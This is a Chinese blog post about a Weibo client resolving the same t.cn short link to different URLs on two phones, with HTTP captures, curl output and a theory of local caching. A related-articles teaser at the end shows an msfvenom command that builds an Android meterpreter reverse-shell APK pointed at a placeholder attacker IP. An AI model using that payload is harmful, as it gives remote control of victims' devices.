weibo客户端访问网页链接解析缓存问题?

最新推荐文章于 2021-03-10 03:04:54 发布
最新推荐文章于 2021-03-10 03:04:54 发布
阅读量1.1k 收藏
点赞数
分类专栏: 安全 android 文章标签: 微博
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/70500088
版权
安全 同时被 2 个专栏收录
264 篇文章 7 订阅
订阅专栏
android
23 篇文章 0 订阅
订阅专栏

昨天碰到一个怪事,我转发了一条微博之后,当我在不同终端上访问同一个链接的时候,


居然打开的不是同一个链接。电脑网页版和一加2打开的链接是可以打开的(http://blog.sycsec.com/?p=1005

GET /?p=1005 HTTP/1.1
Host: blog.sycsec.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; ONE A2001 Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Weibo (OnePlus-ONE A2001__weibo__7.2.0__android__android5.1.1)
x-user-agent: OnePlus-ONE A2001__weibo__7.2.0__android__android5.1.1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
X-Requested-With: com.sina.weibo


HTTP/1.1 200 OK
Server: sae
Date: Sat, 22 Apr 2017 20:36:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Link: <http://blog.sycsec.com/?rest_route=/>; rel="https://api.w.org/"
Link: <http://blog.sycsec.com/?p=1005>; rel=shortlink
Via: 15146
Content-Length: 45784

而用我的Nubia7打开同样的这个链接打开的却是http://blog.sycsec.com/mysql注入攻击与防御-2/,之后返回404。

Not Found

The requested URL /mysql注入攻击与防御-2/ was not found on this server.

有burp截图为证。
请求:
这里写图片描述
响应:
这里写图片描述
让我很费解。开始以为是微博版本或者是手机版本的原因(一加2的是7.2版的,而nubia是6.8版),结果当我把一加2的apk文件拿出来放到我的nubia里时依然出现同样的情况。于是我想是不是缓存的原因,我删除了缓存,然而还是没用,最后把微博应用的数据删除了(这下得重新登录了),这次链接才指向了正确的url。这里我说『正确的url』是因为我用网页版微博『右键复制链接』然后通过curl得到的url。

➜  ~  curl "http://t.cn/RXKbciM"                                                                                                  [14:21:33]
<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="http://blog.sycsec.com/?p=1005">here</A>.
</BODY>
</HTML>

也许应该是这样的逻辑:发布者把原始链接(但是原始链接到底是什么呢?应该只有发布者知道了吧)放到微博上时,微博将其转换成了http://t.cn/RXKbciM,这是所有客户端都会展现的,但是这个链接会解析到哪里每个客户端就不同了,可能最开始我是在nubia上打开这个链接的,这个链接被解析到这里http://blog.sycsec.com/mysql注入攻击与防御-2/,然后后来链接被解析到了http://blog.sycsec.com/?p=1005,但是我nubia的缓存没有被删除,于是还按照之前解析到了那个不存在的页面(或许是之后才被删的?),但是我的一加2就不存在缓存的问题,因为用它第一次打开那个链接的时候就是服务端修改后的情况http://blog.sycsec.com/?p=1005

————更新—————-
后来通过google搜t.cn得知这是新浪用的短网址。可以在
http://dwz.wailian.work这里将原始链接转换成短网址。我尝试了一下http://blog.sycsec.com/?p=1005,发现它被转换成了http://t.cn/RXKbciM,而http://blog.sycsec.com/mysql注入攻击与防御-2/被转换成了
http://t.cn/RX0SdVU。那是不是微博客户端本地有一个短网站解析器呢?因为我用burp拦截请求的时候发现并没有到t.cn的请求。

caiqiiqi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
微博数据爬取demo ,解析微博评论数,点赞数,图片链接
03-31
微博数据爬取demo ,解析微博评论数,点赞数,图片链接
微博链接解析ShortUrl【PHP代码实现】
weixin_33674976的博客
03-07 882
2019独角兽企业重金招聘Python工程师标准>>> ...
html url统一资源定位器
jhhuang4836的专栏
11-18 336
HTML 统一资源定位器 ·         HTML 实体 ·         HTML URL 编码 URL 也被称为网址。 URL 可以由单词组成,比如 “w3school.com.cn”,或者是因特网协议(IP)地址:192.168.1.253。大多数人在网上冲浪时,会键入网址的域名,因为名称比数字容易记忆。 URL - Uniform Resource Locator 当...
php短连接解析,微博链接算法php版本实现代码
weixin_30095343的博客
03-10 208
思路:1)将长网址md5生成32位签名串,分为4段, 每段8个字节;2)对这四段循环处理, 取8个字节, 将他看成16进制串与0x3fffffff(30位1)与操作, 即超过30位的忽略处理;3)这30位分成6段, 每5位的数字作为字母表的索引取得特定字符, 依次进行获得6位字符串;4)总的md5串可以获得4个6位串; 取里面的任意一个就可作为这个长url的短url地址;下面是PHP代码:func...
网页链接解析提取--python实现
kg15511011321的博客
03-23 3761
import chardet from urllib import parse,request from html.parser import HTMLParser from tkinter import * from datetime import datetime import tkinter.messagebox as messagebox url=[] class MyHTMLParse...
Android weibo客户端源代码.rar
11-01
Android weibo客户端源代码.rar
weibo:Weibo.com的Android客户端
05-09
尤达 适用于Android客户端微博
自己写的一个 Sina weibo客户端
03-22
NULL 博文链接:https://goldenrod-z4.iteye.com/blog/1009193
weibo.emacs:Emacs中的新浪微博客户端
06-02
Emacs 的微博客户端安装从安装: M-x package-install RET weibo RET设置现在,你必须自己申请一个微博应用程序才能使用这个包(参见问题和 )并将weibo-consumer-key / weibo-consumer-secret更改为你的。...
Weibo:微博客户端源码-源码客
03-24
微博 微博客户端源码。想要开发经验的必看。 已一个完整的开发案例(功能完善的微博客户端)连续始终。 旨在帮助读者Swift清理Android应用开发的完整流程和实现细节,
两次请求相同的一个URL,会产生缓存问题
03-08
两次请求相同的一个URL,会产生缓存问题。 博文链接:https://weiye.iteye.com/blog/100470
下载链接解析工具
11-13
迅雷 电驴 bt等链接完全转化为实际网址,直接复制进浏览器进入下载即可,多方便。非原创作品。
微博实体链接分析数据集
09-17
中文微博实体链接分析数据集,可以练习使用。
msfvenom生成apk payload然后得到meterpreter shell
公众号shadow sock7
11-15 4368
先生成一个payload,带上meterpreter监听的地址和端口: msfvenom -p android/meterpreter/reverse_tcp LHOST=&amp;amp;amp;lt;your public IP&amp;amp;amp;gt; LPORT=80 -o msf.apk 由于大号端口在我的wifi环境下无法出去,所以这里我设置为80端口。 然后安装这个apk到手机。 然后在msf上: use exploit/...
IDA打开自动显示注释选项
公众号shadow sock7
06-29 3647
对于不太熟悉汇编指令的同学,初次接触IDA的时候被IDA反编译出来的汇编指令吓到了,殊不知IDA其实是可以打开自动显示注释的选项的。通过Option->General->Auto Comments即可。显示注释前打开显示注释选项显示注释后
使用grep查看匹配行的前后n行信息
公众号shadow sock7
07-13 2782
$ grep -rn "android.intent.action.MAIN" -B 3 -C 2 AndroidManifest.xml AndroidManifest.xml-43- <activity android:name="com.youdao.dict.activity.DictSplashActivity" android:screenOrientation="port
夜神模拟器修改hosts文件
公众号shadow sock7
08-10 1689
参考: https://www.jianshu.com/p/cef44295a7fe adb root adb remount adb pull /system/etc/hosts 然后本地编辑hosts,记住:最后一行要空出来一行。 最后,将hosts文件push回去 adb push hosts /system/etc/hosts 验证hosts文件是否已被修改: cat /system/etc/hosts 验证hosts是否已生效。 ...
安卓安装包(APK,DEX)的diff工具介绍
公众号shadow sock7
05-20 1498
Android Application Diffing: Engine Overview 讲Quarkslab 背后的设计理念。 第二篇 通过一个漏洞CVE-2019-10875来展现工具的功能。 第三篇通过 https://blog.quarkslab.com/android-application-diffing-analysis-of-modded-version.html ...
能给出一些排行榜的链接吗?
最新发布
03-04
当然可以,以下是一些常见的排行榜链接: 1. 百度风云榜:https://top.baidu.com/ 2. 微博热搜榜:https://s.weibo.com/top/summary 3. 豆瓣电影排行榜:https://movie.douban.com/chart 4. App Store 免费榜:https://www.apple.com/cn/itunes/charts/free-apps/ 5. 中国大学排名:https://www.shanghairanking.cn/rankings/bcur/2021 希望对您有所帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值